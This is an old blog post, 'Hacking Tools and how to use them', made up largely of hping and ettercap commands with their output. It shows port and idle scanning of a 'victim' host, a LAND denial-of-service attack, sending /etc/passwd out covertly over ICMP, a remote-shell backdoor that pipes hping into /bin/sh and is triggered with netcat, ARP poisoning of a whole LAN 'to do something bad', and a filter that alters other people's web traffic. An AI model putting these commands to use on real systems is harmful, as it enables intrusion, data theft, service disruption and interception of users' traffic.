Monday, May 14, 2007

  • Hacking Tools and how to use them

Using HPING:__

1. HPing as port scanner:

[root@localhost root]#hping -I eth0 -S -p 80
len=46 ip= flags=SA DF seq=0 ttl=64 id=11101 win=16080
rtt=2.7 ms
flags=SA means port is open
flags=RA means port is closed

2. Check sequentially:

[root@localhost root]# hping -I eth0 -S -p ++79
HPING (eth0 S set, 40 headers + 0 data
len=46 ip= sport=79 flags=RA seq=0 ttl=255 id=17491 win=0
rtt=2.4 ms
len=46 ip= sport=80 flags=SA DF seq=1 ttl=64 id=17492
win=16080 rtt=3.1 ms
len=46 ip= sport=81 flags=RA seq=2 ttl=255 id=17493 win=0
rtt=1.7 ms

3. Idle scanning:

  • Idle scanning needs a silent host, that has predictable "id" value in packets that are replied for an icmp ping. The victim's box is scanned by using this idle host as the source, and victim's ip as the destination. The idle host is scanned by this host and the "id" value is checked, to find out whether the particular port is open or not. This is anonymous scanning:

Identifying idle machine:

[root@localhost root]# hping -I eth0 -SA 
len=46 ip= flags=R seq=0 ttl=255 id=18106 win=0 rtt=0.4 ms
len=46 ip= flags=R seq=1 ttl=255 id=18107 win=0 rtt=0.4 ms
len=46 ip= flags=R seq=2 ttl=255 id=18108 win=0 rtt=0.4 ms

Scanning the victim box with idle machine as the source:

First run the following command on the victim's box

[root@localhost root]# hping -I eth0 -a -S
-p ++20

Then scan the idle machine using this:

[root@localhost docs]# hping -I eth0 -r -S -p 2000
len=46 ip= flags=RA seq=88 ttl=255 id=+1 win=0 rtt=1.8 ms
len=46 ip= flags=RA seq=89 ttl=255 id=+1 win=0 rtt=1.7 ms
len=46 ip= flags=RA seq=90 ttl=255 id=+1 win=0 rtt=1.8 ms
len=46 ip= flags=RA seq=91 ttl=255 id=+2 win=0 rtt=1.4 ms
(port 25)
id=+2 indicates particular port is open (here it is port 25)

4. Traceroute using any port in HPing:

[root@localhost root]# hping -I eth0 -z -t 6 -S -p 143
HPING (eth0 S set, 40 headers + 0 data bytes
TTL 0 during transit from ip=
7: TTL 0 during transit from ip=
8: TTL 0 during transit from ip=
9: TTL 0 during transit from ip=
10: TTL 0 during transit from ip=
11: TTL 0 during transit from ip=
once you reach the server ...
len=46 ip= flags=SA DF seq=33 ttl=47 id=0 win=5840 rtt=4341.3


[root@localhost root]# hping -I eth0 -a  -S 
-p 80 -i u1000

6. LAND Attack:

A LAND attack was and still is a quite famous DOS attack that was quite effective on Windows NT in the old days. The aim of the attack is to construct a packet that connects a socket to it self. This ended up in using a lot of resources on the OS, causing a DOS.

[root@localhost root]# hping -S -a -p 21
HPING (eth0 S set, 40 headers + 0 data bytes

7. Packets with signatures. Up to now, we simply created packets, in fact IP/TCP headers. In the next example, a data payload is used. The examples shows how we can ‘misuse’ UDP services. This is a simple non-dangerous example, but I leave up to the imagination. Simply create a file containing a signature (Buffer Overflow, ...)

[root@localhost root]# cat /root/signature.sig
[root@localhost root]#
What are we doing ?
The –2 switch will put hping is UDP mode, the –d switch specifies the
length of the data portion and together with the –E switch, the
signature is read from specified file.
[root@localhost rules]# hping -2 -p 7 -d 50 -E
HPING (eth0 udp mode set, 28 headers + 50
data bytes
len=78 ip= seq=0 ttl=128 id=24842 rtt=4.9 ms
len=78 ip= seq=1 ttl=128 id=24844 rtt=1.6 ms
len=78 ip= seq=2 ttl=128 id=24846 rtt=1.0 ms
--- hping statistic ---
3 packets tramitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 1.0/2.5/4.9 ms
[root@localhost rules]#
[root@localhost root]# tcpdump -i eth0 -nX proto 17
tcpdump: listening on eth0
16:56:20.955167 > udp 50
0x0000 4500 004e 1220 0000 4011 d2e1 c0a8 0a2c E..N....@......,
0x0010 c0a8 0a21 062d 0007 003a db41 2222 4255 ...!.-...:.A""BU
0x0020 4646 4552 204f 5645 5246 4c4f 5722 220a FFER.OVERFLOW"".
0x0030 0a00 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 ..............
16:56:20.960147 > udp 50
0x0000 4500 004e 5ec0 0000 8011 4641 c0a8 0a21 E..N^.....FA...!
0x0010 c0a8 0a2c 0007 062d 003a db41 2222 4255 ...,...-.:.A""BU
0x0020 4646 4552 204f 5645 5246 4c4f 5722 220a FFER.OVERFLOW"".
0x0030 0a00 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 ..............

8. Transferring files via ICMP, UDP or TCP:

Run the following on the receiving end:

hping --listen signature --safe --icmp

Run the following on the sending end:

[root@knoppix root]# hping --icmp –d 100 --sign signature
--file /etc/passwd

TCPDump on receiving end gives:

tcpdump -nX -i
tcpdump: listening on eth0
15:21:31.271874 > icmp: echo request
0x0000 4500 0080 60d9 0000 4001 83e5 c0a8 0a42 E...`...@......B
0x0010 c0a8 0a2c 0800 9df1 cf15 0000 7369 676e ...,........sign
0x0020 6174 7572 6572 6f6f 743a 783a 303a 303a atureroot:x:0:0:
0x0030 726f 6f74 3a2f 726f 6f74 3a2f 6269 6e2f root:/root:/bin/
0x0040 6261 7368 0a64 6165 6d6f 6e3a 783a 313a bash.daemon:x:1:
0x0050 313a 1:

9. Transferring a file via TCP:

[root@localhost root]# hping --listen signature --safe
-p 22
hping2 listen mode
[root@knoppix root]hping -p 22 d 100 --sign signature --file

This could be a way to create a full duplex channel across a stateless filter.

[root@localhost root]#hping  --listen signature --safe
-p 22
on the other site
[root@knoppix root]hping -SA -22 d 100 --sign signature --file
[root@localhost root]# tcpdump -nX -i eth0 not host
tcpdump: listening on eth0
15:14:49.755553 arp who-has tell
0x0000 0001 0800 0604 0001 0008 da10 0e44 c0a8 .............D..
0x0010 0a01 0000 0000 0000 c0a8 0a32 addf d404 ...........2....
0x0020 5010 f834 b458 0000 0101 050a addf P..4.X........
15:14:57.813503 > S 926334897:926334997(100) ack
1257790585 win 512

10. HPING as a Trojan.

If hping can be started on the remote machine, you could use all the described techniques above to execute commands on the remote machine. An educational example with udp port 53.

[root@localhost root]# hping --listen signature --safe --
udp -p 53 |/bin/sh
hping2 listen mode
amsn_received lib
anaconda-ks.cfg libfwbuilder-0.10.13-1.rh7.i386.rpm
avi license.txt
CPsrsc-50-02.i386.rpm linux-wlan-ng-0.1.16-pre5
on the other site
[root@knoppix root]# echo ls >test.cmd
[root@knoppix root]# hping -p 53 -d 100 --udp --sign
siganature --file ./test.cmd

11. Even worse In this example, an apache server is running on a linux server. Somehow (this is for another tutorial) we managed to get hping started as follows.

[root@localhost root]# hping -I eth0 --listen signature -p 80 |/bin/sh
hping2 listen mode
amsn_received fwbuilder-pf-1.0.9-1.rh7.i386.rpm
nmap.txt signature.sig
anaconda-ks.cfg install.log
nsmail snmpd.txt
... scripts
on the other machine ...
With a simple netcat, we do the following. The command behind the
signature will be executed on the server, without crashing the services
or interfering.
[root@knoppix root]# echo "signaturels;" | nc 80

501 Method Not Implemented

Method Not Implemented

siganutels; to /index.html not supported.

Invalid method in request siganutels;

Apache/1.3.27 Server at localhost.localdomain Port

[root@localhost root]#
Using Ettercap

1. ARP Poisoning with Remote Browser plugin:

ettercap -T -Q -M arp:remote -i wlan0 / // -P remote_browser

Perform the ARP poisoning against the gateway and the host in the lan between 2 and 10. The ’remote’ option is needed to be able to sniff the remote traffic the hosts make through the gateway.

ettercap -T -M arp:remote / /

2. How to discover Gateway using Ettercap:

Run ettercap and type p to load plugins. Then load the following plugin:


3. How to use NMAP to identify active hosts:

root@box:~# nmap -sP 10.10.10.*

4. How to identify whether ARP cache of victim has been poisoned or not:

Use plugin chk_poison. By now you must be knowing how to use plugins

5. Scan connections between two hosts:

ettercap -Ts

6. Use broadcast ping to scan the LAN:

ettercap -b

7. Scan packets entering or leaving a host at port 21,22 and 23:

ettercap -Ts /,22,23

8. You are fedup of your team, and you really want to do something bad:

ettercap -T -M arp // //

9. A little advanced technique. How to trick another person's browser activities !

This one does not work with proxy enabled (Unfortunate)

i. Write the following into a file called ig.filter. Remember to replace "img src" with just "src" in the case of ESX Server's index page redirection !!!

if (ip.proto == TCP && tcp.dst == 80) {
if (search(, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"your own path to your own jpg\" ");
replace("IMG SRC=", "img src=\"your own path to your own jpg\" ");
msg("Filter Ran.\n");

ii. Compile it using etterfilter as follows:

etterfilter ig.filter -o ig.ef

iii. Then what else ! Run it !!!

ettercap -T -q -F ig.ef -M ARP / //


Post a Comment

<< Home